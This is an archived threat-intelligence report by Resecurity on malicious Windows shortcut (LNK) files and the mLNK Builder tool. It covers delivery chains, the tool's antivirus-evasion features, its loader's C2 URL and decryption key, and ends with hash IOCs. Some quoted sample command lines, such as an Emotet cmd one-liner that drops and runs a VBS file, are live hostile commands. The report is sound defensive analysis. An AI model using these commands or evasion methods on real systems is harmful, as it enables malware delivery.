{ "id": "bae92be7-a06c-4035-a342-629103ef97c1", "created_at": "2026-04-06T01:30:34.371591Z", "updated_at": "2026-04-10T13:12:45.639403Z", "deleted_at": null, "sha1_hash": "fac3b2807d83b5f9574c7ae69dd43596057c750c", "title": "Resecurity | Shortcut-based (LNK) attacks delivering malicious code on the rise", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2501981, "plain_text": "Resecurity | Shortcut-based (LNK) attacks delivering malicious\r\ncode on the rise\r\nPublished: 2022-07-17 · Archived: 2026-04-06 00:09:06 UTC\r\nCybercriminals are always looking for innovative techniques to evade security solutions. Based on the\r\nResecurity® HUNTER assessment, attackers are actively leveraging tools allowing them to generate malicious\r\nshortcut files (.LNK files) for payload delivery.\r\nResecurity, Inc. (USA), a Los Angeles-based cybersecurity company protecting Fortune 500's worldwide, has\r\ndetected an update to one of them most popular tools used by cybercriminals. The tool in question generates\r\nmalicious LNK files, and is so frequently used for malicious payload deliveries these days. \r\nMLNK Builder has emerged in Dark Web with their new version (4.2), and the updated feature-set focuses on AV\r\nevasion and masquerading with icons from legitimately popular applications and file formats.\r\nThe noteable spike of campaigns involving malicious shortcuts (LNK files) conducted by both APT groups and\r\nadvanced cybercriminals was detected in April-May this year – Bumblebee Loader and UAC-0010 (Armageddon)\r\ntargeting EU Countries described by CERT UA. \r\nMalicious shortcuts continue to give hard times to network defenders, especially when combating global botnet\r\nand ransomware activity, using them as a channel for multi-staged payload deliveries.\r\nAccording to experts from Resecurity, the existing MLNK Builder customers will receive an update for free, but\r\nthe authors have also released a “Private Edition” which is only available to a tight circle of vetted customers, it\r\nrequires an additional license costing $125 per build.\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 1 of 21\n\nThe updated tool provides a rich arsenal of options and settings to generate malicious files to appear as legitimate\r\nMicrosoft Word, Adobe PDF, ZIP Archives, images .JPG/.PNG, audio MP3 and even video .AVI files. as well as\r\nmore advanced features to obfuscate malicious payload.\r\nBad actors continue to develop creative ways to trick detection mechanisms enabeling them the\r\nsuccessful delivery of their malicious payloads – by leveraging combinations of extensions and different file\r\nformats, as well as Living Off the Land Binaries (LOLbins).\r\nThe most actively used malware families leveraging LNK-based distribution are TA570 Oakboat (aka Qbot),\r\nIcedID, AsyncRAT and the new strain of Emotet. The most recent Qakbot distribution campaign also included\r\nmalicious Word documents using the CVE-2022-30190 (Follina) zero-day vulnerability in the Microsoft Support\r\nDiagnostic Tool (MSDT).\r\nSome notable campaigns have been detected in April-May 2022. The cybercriminal activity utilized related APT\r\nattacks targeting private and public sectors:\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 2 of 21\n\n- UAC-0010 (Armageddon) Activity targeting EU Countries\r\nhttps://cert.gov.ua/article/39086\r\nThe bad actors are using malicious LNK files in a combination with ISO (via extension spoofing) to confuse the\r\nantivirus logic and endpoint protection solutions. It’s interesting to note how well-known products in the industry\r\nare not able to properly detect and analyze them.\r\nWhat is the LNK file?\r\nShell Link Binary File Format, which contains information that can be used to access another data object. The\r\nShell Link Binary File Format is the format of Windows files with the extension \".LNK\".\r\nLNK is a filename extension for shortcuts to local files in Windows. LNK file shortcuts provide quick access to\r\nexecutable files (.exe) without the users navigating the program's full path.\r\nFiles with the Shell Link Binary File Format (.LNK) contain metadata about the executable file, including the\r\noriginal path to the target application.\r\nWindows uses this data to support the launching of applications, linking of scenarios, and storing application\r\nreferences to a target file.\r\nWe all use .LNK files as shortcuts in our Desktop, Control Panel, Task Menu, and Windows Explorer\r\nWhy attackers use LNK file\r\nSuch files typically look legitimate, and may have an icon the same as an existing application or document. The\r\nbad actors incorporate malicious code into LNK files (e.g. Powershell scenario) allowing the execution of the\r\npayload on the target machine.\r\nThe process of a malicious .LNK\r\nLet’s review a sample of a malicious LNK file in more detail:\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 3 of 21\n\nThe malicious .LNK file\r\nIn this example, PowerShell code was embedded inside the file which will be executed after the victim clicks on\r\nthe LNK file. We have examined the structure of the file using Malcat:\r\nPowerShell code embedded inside the file\r\nYou can see the PowerShell scenario embedded in the file:\r\nPowerShell scenario embedded\r\nThe logic of the scenario allows to bypass the execution policy and download the file from external resource and\r\nexecute it:\r\nBypassing the execution policy\r\nWe observed a campaign that delivered Bumblebee through contact forms on a target’s website. The messages\r\nclaimed that the website used stolen images and included a link that ultimately delivered an ISO file containing\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 4 of 21\n\nthe malware.\r\nResecurity attributed this campaign to another threat actor the company tracks as TA578 and has done since May\r\n2020. TA578 uses email campaigns to deliver malware like Ursnif, IcedID, KPOT Stealer, Buer Loader, and\r\nBazaLoader, as well as Cobalt Strike.\r\nOur researchers detected another campaign in April that hijacked email threads to deliver the Bumblebee malware\r\nloader in replies to the target with an archived ISO attachment.\r\nLNK file executes DLL malware file\r\nSo, we can extract the hidden file with pass, we can see that in the next figure.\r\nExtracting the hidden file with pass\r\nAfter that we can examine the .ISO contents which includes a document file (.LNK file) and namr.dll file, we can\r\nthen further analyze the .LNK file, shown in the next figure.\r\nAnalyzing the malicious .LNK file\r\nFrom the previous figure, we identify how the .LNK file contains a command to execute the .DLL file.\r\nHow Attackers Generate Malicious LNK Files?\r\nAttackers can generate malicious shortcuts via tools available for sale in the Dark Web. One such tool is\r\nadvertised in a Telegram channel “Native-One.xyz | Products \u0026 Software | Exploit \" called mLNK builder – it\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 5 of 21\n\ngrants the ability to convert any payload into a .LNK file format.\r\nGeneration of malicious shortcut files\r\nCybercriminals can purchase mLNK builder by using one of the three available plans, starting from a one month\r\nto 3 month plan and then a private option (providing unique stub).\r\nPurchasing the mLNK builder\r\nThe price of the tool starts from $100 (per month) with the option to evade Windows Defender, Smart Screen and\r\nUAC:\r\nmLNK tool evades Windows Defender, Smart Screen \u0026 UAC\r\nThe features of the mLNK builder include bypassing the following solutions:\r\n1. Windows Defender\r\n2. Windows Defender Memory\r\n3. Windows Defender Cloud Scanner\r\n4. Smart Screen Alert\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 6 of 21\n\n5. AMSI and MUCH MORE!\r\nThe features of mLNK\r\nAfter buying the tool, the author of the tool will send you text file containing the credential to login.\r\nThe text file containing credentials to login\r\nAfter we opened the link we found this page, we must enter the credentials which were sent by the author, after\r\nregistering the tool will downloaded.\r\nToken registration\r\nRecently they published a new version of the tool, it will be free to all the old users, it now also contains new\r\nICONs like Documents and PDF as we will see in this report.\r\n- https://t.me/NativeOne_Products/24224\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 7 of 21\n\nThe analysis of the tool\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 8 of 21\n\nHere we can see the analysis of the tool, we can see there are two functions.\r\nAnalyzing the malicious tool\r\nWhen examining the sub_401350, we can see how the tool use ShellExcuteA to execute the PowerShell code.\r\nThis PowerShell communicates with C\u0026C, we can see that in the next figure.\r\nPowerShell communicates with C\u0026C\r\nAfter downloading the binary from C\u0026C, we can decode the payload by using the base64 decoder, then use ASE\r\ndecryption to decrypt the payload, we can then see the process the tool follows to decrypt the payload,\r\n1. Downloading the payload from “https://native-one[.]com:4200/client_auth”\r\n2. Gets 'BHDAU532BKPXTGB89G3JK6KKDSZDY8SM' converts to bytes and computes sha1 and convert to\r\nhex string returns first 32chars of hexstring(aeskey) == fc002b88fa5ccd51bfabd8c753e8aa3d\r\n3. coverts downloaded payload each hex XX to an array of decimal values and get the first 16 and uses it as\r\nIV for AES\r\n4. Decryption AES CBC 256 key == fc002b88fa5ccd51bfabd8c753e8aa3d (32bytes each char 1 byte) IV ==\r\n9042766da089753480c479e2b342862f -fromhex(16bytes).\r\nUsing ASE decryption on the payload\r\nAfter decrypting the payload, we got a second PowerShell code that’s used to validate the credentials, we can see\r\nthat in the next figure.\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 9 of 21\n\nDecrypting the payload reveals second PowerShell code\r\nAfter executing the tool, the email and password used to register is required once again, we can see this in the next\r\nfigure.\r\nAfter executing the tool\r\nWe register with the email and password, then we get the GUI for the tool enabling us to start converting payloads\r\ninto .LNK files, we can see that in the next figure.\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 10 of 21\n\nGUI after logging in\r\nWe can see the folder setup the tool uses which has a Decoders payloads, also we can see the shortcuts for the\r\nconverted payloads, we can see that in the next figure.\r\nWe can now see the folder tree\r\nWe create four payloads to test detection, after creating the payloads, we start importing them one by one to create\r\nshortcuts for them. We test detection by using windows defender and others, we can see importing file into the\r\nnext figure.\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 11 of 21\n\nCreating four payloads to test detection\r\nAfter that we can build the decoder and we can see that in the next figure.\r\nBuilding the decoder\r\nAfter decoding the payload, it will save in the Decoders folders, we can see that in the next figure.\r\nSaved in decoders folder\r\nAnd after that we can import the URL of decoded payload and create the .LNK, we can see that in the next figure.\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 12 of 21\n\nCreating four payloads to test detection\r\nNow, we can build the .LNK file, we can see that in the next figure\r\nBuilding the malicious .LNK (shortcut) file\r\nFinally, we can see the .LNK file in the shortcut folder, we can see that in the next figure.\r\nAfter the creation of the file, we can see the location\r\nSo, now we can examine the target file and see how the .LNK file was created, we can see that in the next figure.\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 13 of 21\n\nExamining the target file to see how it was created\r\nFrom the previous figure, we can see how the target contains PowerShell code. Now, we want to test the detection\r\nof the payload.\r\nThe attackers recently generated a new .LNK file with the PowerShell ICON, this is not common, the .LNK\r\ntechnique nowadays is widely used as we can see in the below screenshot, this is a PowerShell .LNK containing a\r\nnew stage of the malware.\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 14 of 21\n\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 15 of 21\n\nAs observed, the newest version of mLNK Builder demonstrated very low detection rates by popular antivirus\r\nproducts which increases the effectiveness of the malicious .LNK files in cyber-attacks.\r\nRecently we found qabot was using the LNK technique.\r\nobama187 - .html \u003e .zip \u003e .img \u003e .lnk \u003e .dll\r\nas we can see there are two files the LNK file will run the dll file\r\nHere we can see the LNK command\r\n“rundll32.exe scanned.dll,DllUnregisterServer”\r\nAlso, we observed how Bumblebee used the LNK technique\r\nvia OneDrive URLs -\u003e IMG -\u003e LNK -\u003e BAT -\u003e DLL recently\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 16 of 21\n\nAfter we extracted the ISO we found these files, the shortcut was conations, code to run the batch file.\r\nAs we can see the shortcut contains the code to run the batch file in the screenshot below.\r\nThe batch conations this code to run the DLL library.\r\nAlso, recently we caught emotet using the technique to run VBS code via the LNK file, as we can see in the below\r\nscreenshot the LNK file contains the malicious code:\r\n“C:\\Windows\\system32\\cmd.exe /v:on /c findstr \"glKmfOKnQLYKnNs.*\" \"Datos-2504.lnk\" \u003e\r\n\"%tmp%\\YlScZcZKeP.vbs\" \u0026 \"%tmp%\\YlScZcZKSSeP.vbs\"”\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 17 of 21\n\nAnother SideWinder malware was using LNK\r\nIt will download a new stage by using this command.\r\nAnother sample was related to ICDL malware, it was also using LNK\r\nISO -\u003e LNK -\u003e DLL\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 18 of 21\n\nIt contained these files, the document file contains the command to run the DLL library.\r\nAs we can see here, the command.\r\nAlso, we have found a new one related to Matanbuchus. Matanbuchus Loader is a new malware-as-a-service\r\ncreated by a threat actor who references demonic themes in software and usernames.\r\nIt appears as a normal file but contains malicious code within it, as we can see in the below screenshot\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 19 of 21\n\nThe malicious code will ping a malicious domain to create a new directory “ItF5”, and it will download new file\r\nas an image then change it to a new file, and run it.\r\nIOCs:\r\nfa15b97a6bb4d34e84dfb060b7114a5d\r\na4e45d28631ea2dd178f314f1362f213\r\ne82abc3b442ca4828d84ebaa3f070246\r\nd1f00a08ecedd4aed664f5a0fb74f387\r\n567dde18d84ceb426dfd181492cee959\r\nff942b936242769123c61b5b76a4c7ad\r\nbfc3995ae78a66b857863ad032a311ae\r\n3952caf999263773be599357388159e0\r\n3053114b52f1f4b51d1639f8a93a8d4a\r\nac664772dc648e84aa3bec4de0c50c6c\r\n59923950923f8d1b5c7c9241335dff8c\r\n673ecadfd3f6f348c9d676fd1ed4389a\r\n27c86be535bedfb6891068f9381660ac\r\n75d993bbd6f20b5294c89ae5125c3451\r\nd2b90fa83209f7ca05d743c037f1f78c\r\n7d8d6338cf47b62524b746ef9530b07f\r\n3ac4a01e62766d2a447a515d9b346dbb\r\n2b41c35010693c4adffb43bfca65c122\r\n7b67f5c27df1ba2fb4a2843a9a24268b\r\n6a00d0a9e6c4ec79408393984172a635\r\n51c2e7a75c14303e09b76c9812641671\r\nd1a288f0ec71789621d1f6cce42973c8\r\n4abfe9a42ef90201a6fa6945deacfc86\r\nb58e53c6120c2f33749c4f3f31d2713d\r\n86dbd6d9376cec15f624685e1349dd86\r\n625ea570a70a4640c46c8eddc2f8c562\r\n59ddeeed7cb3198f3d961df323c314517a6c0ee096b894330b9e43e4d1dc9c5b\r\n5b99c3a4c9fd79a90fd7f2d0c743de73c4a4c053fb326752c061ce5ab6a1c16f\r\nc7d4272fd706f4a07973bc644501afc0d423a9cc47c21fd4cad45686c4a7cd80\r\nD9927533C620C8A499B386A375CB93C17634801F8E216550BD840D4DBDD4C5C6\r\ne722083fbfacdea81b4e86251c004a1b90f864928af1369aa021559cb55aba75\r\n115D7891A2ABBE038C12CCC9ED3CFEEDFDD1242E51BCC67BFA22C7CC2567FB10\r\nReferences:\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 20 of 21\n\n- UAC-0010 (Armageddon) Activity targeting EU Countries\r\nhttps://cert.gov.ua/article/39086\r\nSource: https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nhttps://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise\r\nPage 21 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise" ], "report_names": [ "shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise" ], "threat_actors": [ { "id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308", "created_at": "2022-10-25T15:50:23.320841Z", "updated_at": "2026-04-10T02:00:05.356444Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Gamaredon Group", "IRON TILDEN", "Primitive Bear", "ACTINIUM", "Armageddon", "Shuckworm", "DEV-0157", "Aqua Blizzard" ], "source_name": "MITRE:Gamaredon Group", "tools": [ "QuietSieve", "Pteranodon", "Remcos", "PowerPunch" ], "source_id": "MITRE", "reports": null }, { "id": "62585174-b1f8-47b1-9165-19b594160b01", "created_at": "2023-01-06T13:46:39.369991Z", "updated_at": "2026-04-10T02:00:03.304964Z", "deleted_at": null, "main_name": "TA578", "aliases": [], "source_name": "MISPGALAXY:TA578", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e", "created_at": "2023-01-06T13:46:39.080551Z", "updated_at": "2026-04-10T02:00:03.206572Z", "deleted_at": null, "main_name": "RAZOR TIGER", "aliases": [ "APT-C-17", "T-APT-04", "SideWinder" ], "source_name": "MISPGALAXY:RAZOR TIGER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d5156b55-5d7d-4fb2-836f-861d2e868147", "created_at": "2023-01-06T13:46:38.557326Z", "updated_at": "2026-04-10T02:00:03.023048Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "ACTINIUM", "DEV-0157", "Blue Otso", "G0047", "IRON TILDEN", "PRIMITIVE BEAR", "Shuckworm", "UAC-0010", "BlueAlpha", "Trident Ursa", "Winterflounder", "Aqua Blizzard", "Actinium" ], "source_name": "MISPGALAXY:Gamaredon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "52eb5fb6-706b-49c0-9ba5-43bea03940d0", "created_at": "2024-11-01T02:00:52.694476Z", "updated_at": "2026-04-10T02:00:05.410572Z", "deleted_at": null, "main_name": "TA578", "aliases": [ "TA578" ], "source_name": "MITRE:TA578", "tools": [ "Latrodectus", "IcedID" ], "source_id": "MITRE", "reports": null }, { "id": "d9b39228-0d9d-4c1e-8e39-2de986120060", "created_at": "2023-01-06T13:46:39.293127Z", "updated_at": "2026-04-10T02:00:03.277123Z", "deleted_at": null, "main_name": "BelialDemon", "aliases": [ "Matanbuchus" ], "source_name": "MISPGALAXY:BelialDemon", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "96d5b301-0872-444c-ba32-eecf7a9241c0", "created_at": "2023-02-15T02:01:49.560566Z", "updated_at": "2026-04-10T02:00:03.347926Z", "deleted_at": null, "main_name": "TA570", "aliases": [ "DEV-0450" ], "source_name": "MISPGALAXY:TA570", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6b9fc913-06c6-4432-8c58-86a3ac614564", "created_at": "2022-10-25T16:07:24.185236Z", "updated_at": "2026-04-10T02:00:04.893541Z", "deleted_at": null, "main_name": "SideWinder", "aliases": [ "APT-C-17", "APT-Q-39", "BabyElephant", "G0121", "GroupA21", "HN2", "Hardcore Nationalist", "Rattlesnake", "Razor Tiger", "SideWinder", "T-APT-04" ], "source_name": "ETDA:SideWinder", "tools": [ "BroStealer", "Capriccio RAT", "callCam" ], "source_id": "ETDA", "reports": null }, { "id": "61940e18-8f90-4ecc-bc06-416c54bc60f9", "created_at": "2022-10-25T16:07:23.659529Z", "updated_at": "2026-04-10T02:00:04.703976Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Actinium", "Aqua Blizzard", "Armageddon", "Blue Otso", "BlueAlpha", "Callisto", "DEV-0157", "G0047", "Iron Tilden", "Operation STEADY#URSA", "Primitive Bear", "SectorC08", "Shuckworm", "Trident Ursa", "UAC-0010", "UNC530", "Winterflounder" ], "source_name": "ETDA:Gamaredon Group", "tools": [ "Aversome infector", "BoneSpy", "DessertDown", "DilongTrash", "DinoTrain", "EvilGnome", "FRAUDROP", "Gamaredon", "GammaDrop", "GammaLoad", "GammaSteel", "Gussdoor", "ObfuBerry", "ObfuMerry", "PlainGnome", "PowerPunch", "Pteranodon", "Pterodo", "QuietSieve", "Remcos", "RemcosRAT", "Remote Manipulator System", "Remvio", "Resetter", "RuRAT", "SUBTLE-PAWS", "Socmer", "UltraVNC" ], "source_id": "ETDA", "reports": null }, { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null }, { "id": "173f1641-36e3-4bce-9834-c5372468b4f7", "created_at": "2022-10-25T15:50:23.349637Z", "updated_at": "2026-04-10T02:00:05.3486Z", "deleted_at": null, "main_name": "Sidewinder", "aliases": [ "Sidewinder", "T-APT-04" ], "source_name": "MITRE:Sidewinder", "tools": [ "Koadic" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775439034, "ts_updated_at": 1775826765, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fac3b2807d83b5f9574c7ae69dd43596057c750c.pdf", "text": "https://archive.orkl.eu/fac3b2807d83b5f9574c7ae69dd43596057c750c.txt", "img": "https://archive.orkl.eu/fac3b2807d83b5f9574c7ae69dd43596057c750c.jpg" } }